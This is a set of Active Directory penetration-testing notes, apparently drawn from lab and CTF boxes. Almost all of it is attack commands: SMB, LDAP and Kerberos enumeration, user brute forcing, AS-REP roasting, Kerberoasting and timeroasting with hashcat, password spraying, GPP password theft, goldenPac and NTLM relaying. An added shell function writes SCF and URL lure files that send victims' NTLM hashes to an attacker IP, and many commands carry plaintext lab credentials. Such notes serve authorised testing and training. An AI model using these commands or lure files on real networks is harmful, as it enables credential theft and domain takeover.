Scanning
nxc smb $IP
proxychains cme smb $IP 2>/dev/null
nxc smb ips.txt -u '' -p ''
cme smb ips.txt -u '' -p '' --shares
- If the tool reports STATUS_NOT_SUPPORTED, NTLM authentication is disabled on the target and you have to authenticate with Kerberos.
- Configure /etc/krb5.conf and /etc/hosts for the domain and the DC, then pass the -k flag to nxc; the target must be given by hostname rather than IP for Kerberos to work.
nxc smb DC-JPQ225 -u Rosie.Powell -p 'Cicada123' -d cicada.vl -k --shares
cme smb ips.txt -u 'guest' -p '' --shares
smbclient.py 'guest@10.10.76.112'
smbclient.py 'cicada.vl/rosie.powell@DC-JPQ225' -k

SMB signing
In a hardened AD environment SMB signing is required on every host; any host on which signing is not required is a target for an NTLM relay attack. DCs require signing by default, member servers and workstations do not, so enumerate the signing state across the whole range before relaying.
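Added example (not part of the original notes): a small filter that turns the banner lines nxc/cme print for each host into the list of relay targets. The sample banner lines are constructed to match the nxc smb output format; the hosts and domain are made up.

```shell
# Constructed sample of `nxc smb ips.txt` banner output (not captured from a
# real engagement). Field 2 is the IP; the banner carries (signing:True|False).
SAMPLE_NXC_OUTPUT='SMB         192.168.56.10   445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    SRV01            [*] Windows Server 2019 Build 17763 x64 (name:SRV01) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         192.168.56.12   445    WS01             [*] Windows 10 Build 19041 x64 (name:WS01) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:True)
SMB         192.168.56.13   445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)'

# stdin: nxc smb banner lines. stdout: one IP per host that does not require
# signing, i.e. the hosts to put in the ntlmrelayx target file.
relay_targets() {
    awk '/\(signing:False\)/ { print $2 }'
}

# stdin: the same lines. stdout: "IP True|False" for every host, so the hosts
# that do require signing (normally the DCs) are visible as well.
signing_report() {
    awk 'match($0, /\(signing:(True|False)\)/) {
            # RSTART points at "(signing:"; drop those 9 chars and the ")"
            print $2, substr($0, RSTART + 9, RLENGTH - 10)
         }'
}

relay_targets_from_sample() {
    printf '%s\n' "$SAMPLE_NXC_OUTPUT" | relay_targets
}

relay_count_from_sample() {
    relay_targets_from_sample | wc -l | tr -d ' '
}
```

In practice the input comes from the scan itself: `nxc smb ips.txt | relay_targets > relay_targets.txt`, then `ntlmrelayx.py -tf relay_targets.txt -smb2support`. nxc also has a built-in `--gen-relay-list FILE` option that writes the same list directly; the filter above is useful when you only have saved scan output.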
Enumerate DC ip
nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
Poison and Relay
Do this at the start of your internal recon: run the poisoner (Responder) and the relay (ntlmrelayx against the hosts that do not require signing) while the rest of the enumeration continues.
Enumerate DC anonymously
Only possible when the DC allows anonymous (null session) access.
enumerate users
cme smb $IP --users
cme ldap $IP --users
ldapsearch -x -H ldap://10.10.66.196 -b "DC=baby,DC=vl" "(objectClass=user)" sAMAccountName | grep "^sAMAccountName:" | awk '{print $2}' > users.txt
Run every type of user enumeration; a single tool sometimes misses accounts.
impacket-lookupsid anonymous@10.10.81.153
enumerate user description
nxc ldap 10.10.77.248 -u '' -p '' -M user-desc
enumerate password policy before brute force
cme smb $IP --pass-pol
enumerate auto with enum4linux
enum4linux 192.168.56.11
enumerate manually
rpcclient -U "Domain\\" 192.168.56.11 -N
(the domain part can be anything for a null session; -N suppresses the password prompt)
net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.56.11' -U '%'
List guest access on shares
cme smb $IP -u '' -p '' --shares
cme smb $IP -u 'a' -p '' --shares
NTLM theft when we have write access on a share
NTLM theft by uploading files on an SMB share
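Added example (not part of the original notes, and not the ntlm_theft tool itself): a function that writes two lure files to drop on a writable share. The attacker IP and output directory are parameters you supply; the file layouts follow the SCF and Internet Shortcut formats used by tools such as ntlm_theft. When a user opens the folder in Explorer, the client resolves IconFile over SMB and sends its Net-NTLMv2 response to whatever is listening on the attacker IP (Responder, or ntlmrelayx to relay it).

```shell
# $1: attacker IP running Responder/ntlmrelayx, $2: directory to write lures into.
# Prints the files it created.
make_ntlm_lures() {
    attacker="$1"
    outdir="$2"
    mkdir -p "$outdir"

    # .scf: Explorer fetches the icon as soon as the directory listing is
    # rendered. The leading "@" sorts the file to the top of the listing.
    cat > "$outdir/@icon.scf" <<EOF
[Shell]
Command=2
IconFile=\\\\${attacker}\\share\\icon.ico
[Taskbar]
Command=ToggleDesktop
EOF

    # .url: same trick via an Internet Shortcut. %USERNAME% is expanded on the
    # victim, so the requested path tells you which user browsed the share.
    cat > "$outdir/@readme.url" <<EOF
[InternetShortcut]
URL=https://${attacker}/
WorkingDirectory=\\\\${attacker}\\share
IconFile=\\\\${attacker}\\share\\%USERNAME%.ico
IconIndex=1
EOF
    ls "$outdir"
}
```

Upload the files with `smbclient //host/share -U user` and `put @icon.scf`, start `responder -I eth0` on the attacker host, and wait for a user to browse the folder. Drop both variants: which one fires depends on the client's Explorer settings and patch level, and the captured Net-NTLMv2 hash cracks with hashcat mode 5600.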
Enumerate DCs anonymously - when anonymous sessions are not allowed
Create a user list
If anonymous login is not allowed on the DC, which is the case most of the time, user names can still be brute forced against Kerberos (port 88).
Kerberos user enumeration sends AS-REQs without pre-authentication, so it does not increment badPwdCount and cannot lock accounts out.
User Enum through Brute force
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='domain name (eg.sevenkingdoms.local)',userdb=got_users.txt" $IP
./kerbrute_linux_amd64 userenum --dc dc.office.htb -d office.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
cme smb 10.10.79.192 -u 'meow' -p '' --rid-brute   (RID cycling over SAMR; needs guest or null access to the DC)
- Discovers valid usernames by sending AS-REQs for likely usernames to the Kerberos service (KDC).
- When an invalid username is requested the server responds with the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, which tells us the user name does not exist.
- Valid user names elicit either a TGT in an AS-REP (pre-authentication not required, so the account is AS-REP roastable) or the error KRB5KDC_ERR_PREAUTH_REQUIRED, signaling that the user must perform pre-authentication.
- Because no pre-authentication is attempted, this does not trigger Microsoft's account lockout policy.
Users but No Credentials
AS-REP Roasting
impacket-GetNPUsers bruno.vl/svc_scan -no-pass -request
hashcat -m 18200 svc_scan_hash /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
Password spraying, only if the lockout policy allows it (check --pass-pol first)
cme smb $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success
(--no-bruteforce pairs each user with the password on the same line, here username-as-password; without it every user is tried against every password)
Enumerate DC with Creds
GetADUsers.py -all domain/username:password
ldapsearch -H ldap://$IP -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'
Use the password spraying techniques above to fish for users with weak passwords.
Time Roasting Attack
nxc smb 10.1.15.4 -M timeroast | grep -oP '\d+:\$sntp-ms\$[a-f0-9$]+' > timeroast_clean.txt
hashcat -m 31300 timeroast_clean.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt --username
- The hashes belong to computer accounts (the SNTP MS-extension MAC is keyed with the computer account's NT hash); make a clean list and crack it with hashcat mode 31300. Only accounts that still have a weak or default password (typically pre-created or stale computer accounts) will crack.
- The number before $sntp-ms$ is the account's RID; look it up in BloodHound (objectid ends with -RID) to find the associated computer account.
Having valid domain creds
Check AS-REP roasting and Kerberoasting (crack with hashcat modes 18200 and 13100 respectively)
cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --asreproast ASREPROAST
cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --kerberoasting KERBEROASTING
crackmapexec smb 10.10.254.37 -u samuel.davies -p l6fkiy9oN -M gpp_password
Kerberoasting
Clock Skew
- Kerberos rejects requests when the client clock is more than 5 minutes (the default MaxClockSkew) off the DC's clock, giving KRB_AP_ERR_SKEW.
- If ntpdate cannot set the clock (e.g. a VirtualBox guest whose hardware clock is UTC and managed by the hypervisor), set it from the DC's reported time manually:
sudo date -s "$(ntpdate -q $domaincontroller | grep -oP '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}')"
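Added example (not part of the original notes): helpers that read the offset from `ntpdate -q <dc>` output, decide whether it exceeds the Kerberos tolerance, and compute the epoch to set with `date -s`. The ntpdate output below is constructed in the format ntpdate prints, not captured; KRB_MAX_SKEW is the default MaxClockSkew, which the domain may have changed.

```shell
# Default Kerberos tolerance in seconds (MaxClockSkew); assumption, the domain may set another value.
KRB_MAX_SKEW=300

# Constructed sample of `ntpdate -q 192.168.56.10` output, not a real capture.
SAMPLE_NTPDATE='server 192.168.56.10, stratum 3, offset +412.318204, delay 0.02563
 6 Jan 14:02:11 ntpdate[4242]: step time server 192.168.56.10 offset +412.318204 sec'

# stdin: ntpdate -q output. stdout: signed offset in seconds, e.g. "412.318204"
# or "-7.5" (DC time minus local time).
ntp_offset() {
    sed -n 's/.*offset +\{0,1\}\(-\{0,1\}[0-9][0-9.]*\),.*/\1/p' | head -n 1
}

# $1: offset in seconds. Exit 0 when |offset| exceeds KRB_MAX_SKEW (Kerberos
# will fail with KRB_AP_ERR_SKEW), 1 when the clock is close enough.
skew_needs_fix() {
    awk -v o="$1" -v lim="$KRB_MAX_SKEW" 'BEGIN { if (o < 0) o = -o; exit (o > lim) ? 0 : 1 }'
}

# $1: local epoch seconds, $2: offset. stdout: corrected epoch (truncated to seconds).
target_epoch() {
    awk -v now="$1" -v off="$2" 'BEGIN { printf "%d\n", int(now + off) }'
}

# Real usage (not run by the test): sudo sh -c '. ./skew.sh; sync_to_dc 192.168.56.10'
sync_to_dc() {
    off=$(ntpdate -q "$1" | ntp_offset) || return 1
    if skew_needs_fix "$off"; then
        date -s "@$(target_epoch "$(date +%s)" "$off")"
    else
        echo "offset ${off}s is within ${KRB_MAX_SKEW}s; nothing to do"
    fi
}
```

If you cannot or do not want to change the system clock (shared VM, other jobs running), run the Kerberos tooling under `faketime` with the DC's time instead; the offset from `ntp_offset` tells you how far to shift.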
Share enum with creds
cme smb 192.168.56.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares
Accessing the shares
smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.10.10'
Blood Hound
From Kali
bloodhound.py --zip -c All -d $Domain$ -u user@domain -p password -dc dc.domain.local
cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --bloodhound -c all -ns 10.10.91.0
nxc ldap 10.10.11.5 -u mikasaAckerman -p 'IL0v3ErenY3ager' --bloodhound -c All -d freelancer.htb --dns-server 10.10.11.5
bloodhound-python --zip -c All -d lustrous2.vl -u Thomas.myers@lustrous2.vl -dc lus2dc.lustrous2.vl --auth-method kerberos -ns 10.10.119.13 --use-ldaps
From Windows
.\sharphound.exe -d domain -c all --zipfilename any_name.zip
From Sliver C2
Execute it from the directory where the user has write access.
sharp-hound-4 -i -- "-c all"
Hunting with Blood Hound
show all domains and computer
MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p
And show all the users
MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p
Overall map of domains/groups/users
MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q
Outbound ACL edges of every user (excluding the lab's vagrant accounts)
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p
Unconstrained delegation on computers other than the domain controllers (Domain Controllers group RID 516)
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2
Resources on Blood hound query
sAMAccountName spoofing (noPac) CVE-2021-42278 / CVE-2021-42287
PrintNightmare
MS14-068 (Kerberos PAC validation; exploited by goldenPac)
impacket-goldenPac $DOMAIN/$USER:$PASSWORD@10.1.15.100
Move back to Host Recon or AD Recon below
ADtool and Pbis linux
https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
Getting users with descriptions
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n "COREWEBDL$" | grep "CN" | while read line; do echo "$line" && ./adtool --keytab=/etc/krb5.keytab -n 'COREWEBDL$@CORE.CYBER.LOCAL' -a lookup-object --dn="$line" --attr "description" && echo "======================"; done